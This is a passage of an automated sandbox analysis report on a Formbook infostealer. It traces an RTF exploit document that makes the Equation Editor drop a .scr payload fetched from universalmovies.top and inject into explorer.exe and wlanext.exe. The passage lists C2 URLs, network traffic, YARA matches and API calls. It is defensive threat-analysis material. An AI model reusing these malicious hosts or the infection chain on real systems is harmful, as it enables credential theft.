      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ngbbvuhkm5.asiaReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.nvzhuang1.net
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.nvzhuang1.net/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.nvzhuang1.netReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.onlynaturlpt.shop
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.onlynaturlpt.shop/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.onlynaturlpt.shop/btrd/www.wirewizardselectric.net
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.onlynaturlpt.shopReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.outletivo.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.outletivo.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.outletivo.com/btrd/www.380747.net
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.outletivo.comReferer:
      Source: explorer.exe, 0000000D.00000000.403393890.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003D38000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.402401049.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007542000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.00000000074EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923839684.000000000260D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 0000000D.00000000.403393890.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003D38000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.402401049.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.924123872.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007542000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.0000000007526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.403988808.00000000074EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923839684.000000000260D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 0000000D.00000000.402401049.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923839684.000000000260D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerxe
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texanboxes.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texanboxes.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texanboxes.com/btrd/www.outletivo.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texanboxes.comReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turbrun.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turbrun.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turbrun.com/btrd/www.wzxq.xyz
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.turbrun.comReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wirewizardselectric.net
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wirewizardselectric.net/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wirewizardselectric.net/btrd/www.martline.website
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wirewizardselectric.netReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wzxq.xyz
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wzxq.xyz/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wzxq.xyz/btrd/www.texanboxes.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wzxq.xyzReferer:
      Source: explorer.exe, 0000000D.00000002.924636332.000000000898F000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 0000000E.00000002.923772394.0000000002A1F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://google.com
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
      Source: explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, universalmovies.top.url.0.drString found in binary or memory: https://universalmovies.top/
      Source: nelb.doc.url.0.drString found in binary or memory: https://universalmovies.top/nelb.doc
      Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000009.00000002.398265813.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/nelb.scr
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/nelb.scriiC:
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/nelb.scrj
      Source: EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/nelb.scrll
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://universalmovies.top/nelb.scrula
      Source: explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
      Source: explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
      Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49166 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49173 version: TLS 1.2

      E-Banking Fraud

      Source: Yara match | File source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      System Summary

      Source: 10.2.nelb82019.scr.860000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
      Source: 10.2.nelb82019.scr.32a5770.5.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
      Source: 10.2.nelb82019.scr.2296f6c.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
      Source: 10.2.nelb82019.scr.860000.1.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
      Source: 10.2.nelb82019.scr.22997ac.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
      Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.402124623.0000000000860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
      Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: Process Memory Space: nelb82019.scr PID: 3216, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: nelb82019.scr PID: 3248, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: wlanext.exe PID: 3372, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\497AF0F0.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nelb[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nelb.doc.urlJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\universalmovies.top.urlJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\nelb82019.scrJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scrJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\wlanext.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009200C4 NtCreateFile,LdrInitializeThunk,11_2_009200C4
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00920048 NtProtectVirtualMemory,LdrInitializeThunk,11_2_00920048
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00920078 NtResumeThread,LdrInitializeThunk,11_2_00920078
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091F9F0 NtClose,LdrInitializeThunk,11_2_0091F9F0
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091F900 NtReadFile,LdrInitializeThunk,11_2_0091F900
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_0091FAD0
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FAE8 NtQueryInformationProcess,LdrInitializeThunk,11_2_0091FAE8
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FBB8 NtQueryInformationToken,LdrInitializeThunk,11_2_0091FBB8
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FB68 NtFreeVirtualMemory,LdrInitializeThunk,11_2_0091FB68
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FC90 NtUnmapViewOfSection,LdrInitializeThunk,11_2_0091FC90
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FC60 NtMapViewOfSection,LdrInitializeThunk,11_2_0091FC60
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FD8C NtDelayExecution,LdrInitializeThunk,11_2_0091FD8C
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FDC0 NtQuerySystemInformation,LdrInitializeThunk,11_2_0091FDC0
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FEA0 NtReadVirtualMemory,LdrInitializeThunk,11_2_0091FEA0
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_0091FED0
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FFB4 NtCreateSection,LdrInitializeThunk,11_2_0091FFB4
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00920060 NtQuerySection,11_2_00920060
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009201D4 NtSetValueKey,11_2_009201D4
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0092010C NtOpenDirectoryObject,11_2_0092010C
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009207AC NtCreateMutant,11_2_009207AC
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00920C40 NtGetContextThread,11_2_00920C40
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009210D0 NtOpenProcessToken,11_2_009210D0
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00921148 NtOpenThread,11_2_00921148
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091F8CC NtWaitForSingleObject,11_2_0091F8CC
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00921930 NtSetContextThread,11_2_00921930
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091F938 NtWriteFile,11_2_0091F938
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FAB8 NtQueryValueKey,11_2_0091FAB8
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FA20 NtQueryInformationFile,11_2_0091FA20
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FA50 NtEnumerateValueKey,11_2_0091FA50
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FBE8 NtQueryVirtualMemory,11_2_0091FBE8
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FB50 NtCreateKey,11_2_0091FB50
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FC30 NtOpenProcess,11_2_0091FC30
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FC48 NtSetInformationFile,11_2_0091FC48
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00921D80 NtSuspendThread,11_2_00921D80
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FD5C NtEnumerateKey,11_2_0091FD5C
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FE24 NtWriteVirtualMemory,11_2_0091FE24
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FFFC NtCreateProcessEx,11_2_0091FFFC
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FF34 NtQueueApcThread,11_2_0091FF34
      Source: C:\Windows\explorer.exeCode function: 13_2_08D63E12 NtProtectVirtualMemory,13_2_08D63E12
      Source: C:\Windows\explorer.exeCode function: 13_2_08D62232 NtCreateFile,13_2_08D62232
      Source: C:\Windows\explorer.exeCode function: 13_2_08D63E0A NtProtectVirtualMemory,13_2_08D63E0A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C10096 CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,14_2_00C10096
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0FCA0 memset,memcpy,CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,RtlNtStatusToDosError,14_2_00C0FCA0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C10276 memcpy,memcpy,CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,RtlNtStatusToDosError,14_2_00C10276
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0FDE4 memset,memcpy,CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,RtlNtStatusToDosError,14_2_00C0FDE4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0FBAF CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,RtlNtStatusToDosError,14_2_00C0FBAF
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C1014C CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,RtlNtStatusToDosError,14_2_00C1014C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0FF3F memset,memcpy,CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,RtlNtStatusToDosError,14_2_00C0FF3F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020400C4 NtCreateFile,LdrInitializeThunk,14_2_020400C4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020407AC NtCreateMutant,LdrInitializeThunk,14_2_020407AC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FAB8 NtQueryValueKey,LdrInitializeThunk,14_2_0203FAB8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_0203FAD0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FAE8 NtQueryInformationProcess,LdrInitializeThunk,14_2_0203FAE8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FB50 NtCreateKey,LdrInitializeThunk,14_2_0203FB50
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FB68 NtFreeVirtualMemory,LdrInitializeThunk,14_2_0203FB68
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FBB8 NtQueryInformationToken,LdrInitializeThunk,14_2_0203FBB8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203F900 NtReadFile,LdrInitializeThunk,14_2_0203F900
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203F9F0 NtClose,LdrInitializeThunk,14_2_0203F9F0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_0203FED0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FFB4 NtCreateSection,LdrInitializeThunk,14_2_0203FFB4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FC60 NtMapViewOfSection,LdrInitializeThunk,14_2_0203FC60
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FD8C NtDelayExecution,LdrInitializeThunk,14_2_0203FD8C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FDC0 NtQuerySystemInformation,LdrInitializeThunk,14_2_0203FDC0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02040048 NtProtectVirtualMemory,14_2_02040048
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02040060 NtQuerySection,14_2_02040060
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02040078 NtResumeThread,14_2_02040078
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020410D0 NtOpenProcessToken,14_2_020410D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0204010C NtOpenDirectoryObject,14_2_0204010C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02041148 NtOpenThread,14_2_02041148
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020401D4 NtSetValueKey,14_2_020401D4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FA20 NtQueryInformationFile,14_2_0203FA20
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FA50 NtEnumerateValueKey,14_2_0203FA50
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FBE8 NtQueryVirtualMemory,14_2_0203FBE8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203F8CC NtWaitForSingleObject,14_2_0203F8CC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02041930 NtSetContextThread,14_2_02041930
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203F938 NtWriteFile,14_2_0203F938
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FE24 NtWriteVirtualMemory,14_2_0203FE24
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FEA0 NtReadVirtualMemory,14_2_0203FEA0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FF34 NtQueueApcThread,14_2_0203FF34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FFFC NtCreateProcessEx,14_2_0203FFFC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FC30 NtOpenProcess,14_2_0203FC30
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02040C40 NtGetContextThread,14_2_02040C40
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FC48 NtSetInformationFile,14_2_0203FC48
